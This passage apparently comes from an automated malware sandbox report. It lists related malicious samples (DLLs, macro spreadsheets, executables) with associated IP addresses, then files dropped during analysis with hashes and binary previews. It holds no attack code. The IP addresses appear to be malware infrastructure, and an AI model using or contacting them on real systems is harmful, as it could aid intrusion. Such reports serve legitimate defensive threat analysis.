                                                                                                                                                                          CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          P6h9ZprN2X.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          TkXWcfci7G.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          DIGITALOCEAN-ASNUS7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          urMpgNNXPM.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 188.166.28.199
                                                                                                                                                                          DH-1642092507.xllGet hashmaliciousBrowse
                                                                                                                                                                          • 159.89.171.14
                                                                                                                                                                          vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          zmbGUZTICp.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 188.166.28.199
                                                                                                                                                                          8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          EtUNsUHRzq.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          tijXCZsbGe.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 188.166.28.199
                                                                                                                                                                          PyqpE3VUI3.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135
                                                                                                                                                                          SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 128.199.192.135

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          No context

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8192
                                                                                                                                                                          Entropy (8bit):0.3593198815979092
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                                                          MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                                                          SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                                                          SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                                                          SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:MPEG-4 LOAS
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.2494710206378415
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4K:BJiRdwfu2SRU4K
                                                                                                                                                                          MD5:3DD3D7E80E87203D1C7BB89004A8D220
                                                                                                                                                                          SHA1:DADDAC7589C47773C9982FD21DFDA6D3CF3DC8C3
                                                                                                                                                                          SHA-256:5E18B27E6FF647C0DCC82B8B30AB726316DC321A7ECEC48766C057FCDD4BE107
                                                                                                                                                                          SHA-512:DDDF7C1862E8F0F5E71285785AE56DEE2023FE526A6EF0248C51FF8DA5A4AC85EF4DEA33617DBC16E71012C81AC097D5F926261DD41AC19D72AB616B85E79380
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2bf672a0, page size 16384, Windows version 10.0
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):786432
                                                                                                                                                                          Entropy (8bit):0.25069728547061226
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:ID9+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:ID+SB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                          MD5:B5344D85FFFA6EFD96C9168CBF2E227F
                                                                                                                                                                          SHA1:D58F910A66561C4CDFE40D1A4224A79DAC7D7D9D
                                                                                                                                                                          SHA-256:BCBE03FF65AF0A1C97BA6BD3C77D2E651C3B4647FEAD438AC23A01B2C66BB3AC
                                                                                                                                                                          SHA-512:A05775F4A2B5B0160442400E40011C2015691B7EDCE2FB531C2A29E0F86CE6CF541BB4A2ED4C73649B73336B5465AEEC1899CC5041B3F655A15118B478D482DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: +.r.... ................e.f.3...w........................).....(....z.. ....z..h.(.....(....z....)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................*.o(....z..................%./.(....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                          Entropy (8bit):0.07492102085907504
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:H7vFnn6Rl/eVFMVYlXlqK92kfSRl/all3Vkttlmlnl:Hrhn6KVigXEKJ6a3
                                                                                                                                                                          MD5:41CD932182BFFF3C2AD559448F369CE5
                                                                                                                                                                          SHA1:301C787D5E17D53C6B000C968A18D874A40F0817
                                                                                                                                                                          SHA-256:D89D013B2C65B028C460CAC7D0C38D660DF5B66C7CDFD9D760428FC9B95E4582
                                                                                                                                                                          SHA-512:09E199ECE8200ED224520002B8F91E1205509CB0B0CE5AC5179DE2F524ECCC4B66B882EF7707393ACEA435C617542380E903D3ED3DCDBAF1B08514876436B240
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .........................................3...w.. ....z..(....z..........(....z..(....z..^^..(....z..................%./.(....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d422a667165d65114742feca998c4f65a16c35b9_7cac0383_1a36cef8\Report.wer
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.7988307290443317
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:0eSWRnYykky9haol7JfqpXIQcQSc6mcEUcw3/s+a+z+HbHgWVG4rmMoVazWbSmEb:dS0nRHsieryjuq/u7sNS274ItW
                                                                                                                                                                          MD5:45FB5A394BAE84FDF6223568354F0DDC
                                                                                                                                                                          SHA1:214246D162A257C40E8CCDA4B19214F8A48E209C
                                                                                                                                                                          SHA-256:FA35E8FC6F2335DF9B96AF3CFEA87E46C6682CCB8380AC60391FB91E573737A2
                                                                                                                                                                          SHA-512:D35A249CD59347A32A9462AD149CF92D7EB0B015246CC41789232D4F961B84D9632439402BFC12979444DAC10AD881106A145D2B1981DC34C631969E26C4D06F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.6.1.9.3.6.5.5.7.2.0.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.5.9.0.c.0.8.-.4.9.0.c.-.4.b.c.f.-.8.5.6.9.-.2.7.9.4.3.4.d.8.3.f.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.5.8.3.0.a.e.-.0.d.f.b.-.4.6.c.6.-.b.4.b.6.-.c.6.b.2.d.5.e.c.f.e.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.8.-.0.0.0.1.-.0.0.1.6.-.e.5.0.1.-.a.d.7.b.7.c.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d49576749d3595ac814f4573834167626620dc16_7cac0383_02b38140\Report.wer
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.7504389620871591
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:GQFMRnYyBky9hayf7vf5pXIQcQvc6QcEDMcw3DS+a+z+HbHg/8BRTf3sFEJ8InNS:rwnXHBUZMX4jCq/u7syS274ItW
                                                                                                                                                                          MD5:D1199CADADC75E4C919BCE1E17CDC966
                                                                                                                                                                          SHA1:22687BF35069E16248B67B947C71B8563FA31829
                                                                                                                                                                          SHA-256:CC4B06107077C3A25F947BEA92681B180C7D710FEAFA5A5F3D1DDE969901EB3F
                                                                                                                                                                          SHA-512:703ED6570C4918BA88186175794E450794688FD506F5D816E5EC7FBC004F074EDAADBD1C24A7AFD1DBD2B9826CBB7710440132FA8C0C0BAFB669FE27F1248D9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.6.1.9.4.8.5.0.9.3.1.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.6.1.9.5.5.2.1.2.4.2.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.e.d.5.d.0.f.-.5.1.1.b.-.4.1.e.3.-.8.a.7.c.-.1.0.f.5.4.b.f.4.0.2.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.a.0.a.4.4.8.-.f.4.3.0.-.4.1.d.3.-.9.e.c.0.-.f.9.6.d.b.4.8.7.8.9.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.8.-.0.0.0.1.-.0.0.1.6.-.e.5.0.1.-.a.d.7.b.7.c.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER29A4.tmp.csv
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52714
                                                                                                                                                                          Entropy (8bit):3.070010880769254
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:n/HxQ0v3v22uvyDP5EXSOcYgm4Y9bWLOV4zR5vU:n/HxQ0v3v22uvyDP5EXSOcYgml9bWLO/
                                                                                                                                                                          MD5:6ACD86F20F02016BEADD170F825DEEFE
                                                                                                                                                                          SHA1:69B37F9C3554C9E2F67BAB6E869C4C39CE7F1748
                                                                                                                                                                          SHA-256:1BFD60023640A3BE3C1F8B9C6E1C6B8B5998A2118E2B8F15F7407938B4466D29
                                                                                                                                                                          SHA-512:E283F5592CAC090D034A8C75569A537534C0997A8617C251F28D1DB0FDCB6AEE96413C0D85497A162897303838BEC0E5437E14662F791A13E9A40122D47638B8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D5E.tmp.txt
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                          Entropy (8bit):2.6939065930193515
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:9GiZYWJyz18zpY6Y5WdX6HBYEZd7t8iMZWZnwU6PTaTR+HRctIys3:9jZDz9dILAaTR+HRhys3
                                                                                                                                                                          MD5:08FD52FE4FD05246E4771D7DD03C7B70
                                                                                                                                                                          SHA1:9BF323200EFE260EA6170CBF9ED75ECEBDD72033
                                                                                                                                                                          SHA-256:7BD4A7ACE0413D209DDC207DDBFD32A9A44334AA0654B83C7200FB555370453C
                                                                                                                                                                          SHA-512:71582BAF91B7897A1A56C32D9C5D561C8F34CAA8DB168597AF7E97E89FA9350250F9490EAC0466922138D9473668106E93F643CCBC7C619ACFC8CCF4EDC99A14
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER57FA.tmp.csv
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):53990
                                                                                                                                                                          Entropy (8bit):3.071070329477469
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:rtHt6mo229aljOHFXKIg8KZ/nWL5HwRD0TUrJZ:rtHt6mo229aljOHFXKIg8KxnWL5HwRDn
                                                                                                                                                                          MD5:17949EF319D383EB55EEA09038B1BC35
                                                                                                                                                                          SHA1:0D0D3E22D90E8FFD70EAF94AB186FF5A71A6509D
                                                                                                                                                                          SHA-256:BFFA6636B1DC40CAB21A548A28F9DAB91D6181A75187D8887C02DEF9AD653EEF
                                                                                                                                                                          SHA-512:7685CFAC403CE27113229611B038186B148DF46DA0ECE1C6B39B56C399135094E30F24E1C9F98B3AB1D59844AE36B718086DA7B275C48865DCBBAB358EA8FFCB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C40.tmp.txt
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                          Entropy (8bit):2.693887952351415
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:9GiZYWN7aKCyYcY6WTAHiYEZwXt8itZdZqweolW6aEWiMJXOuIRE3:9jZDyyrBwF6aEWBJXO5RE3
                                                                                                                                                                          MD5:1F35C3B4A98A611014BFB7077C44563B
                                                                                                                                                                          SHA1:868D52CA0E637E55DF5710E61F1BDF52423ABC4C
                                                                                                                                                                          SHA-256:1B6A82D64124398B4238001DD7F9A38D3AD6EE41D5A286AD9BC5028E7CF6CD13
                                                                                                                                                                          SHA-512:CC6A7651192D65036D501F116CA53BF472ACB19FA61571281F621DD85FFE759D57103A8784971D615FA3B5CCB6ADA1B71D975FF1F9677000F38083E7A799408C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBDC1.tmp.dmp
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri Jan 14 19:25:37 2022, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):45668
                                                                                                                                                                          Entropy (8bit):2.079049081824083
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:9bqfjXz/l+KOomYsM3w/9hu2O6ZH3Inkn1LskUDibULOGrcoxUd/+ku:6YVorXw/9hu2hD1LstDigLOGr+Wk
                                                                                                                                                                          MD5:4AF797A7021E2FE48C50D3F70ACB2CBC
                                                                                                                                                                          SHA1:35804CC706229F56F9D6A9880C9C8C577141D450
                                                                                                                                                                          SHA-256:3AF653A791D4F271B31C7F6BC51039330E62C17FD03EE5178C0ABB18622A341D
                                                                                                                                                                          SHA-512:063F1717B69B9B9EC1736B7818FB23C703A6B07D2D1074CA0D97A92893E074EBFC5801F1B7A0CE67E61068C9162E7AAC4970F829C57D4FCA61A162E556955478
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: MDMP....... .......1..a....................................$...T............%..........`.......8...........T...............d...........x...........d....................................................................U...........B..............GenuineIntelW...........T.......H...&..a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC498.tmp.WERInternalMetadata.xml
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8346
                                                                                                                                                                          Entropy (8bit):3.700595654372367
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:Rrl7r3GLNiFr6HTn6YIvSUqhUgmfjSwGxCpBp89boIsfac4m:RrlsNi56HTn6YQSUqhUgmfjSwco7fai
                                                                                                                                                                          MD5:C0C63033B8842BE349D56ABFEE84A841
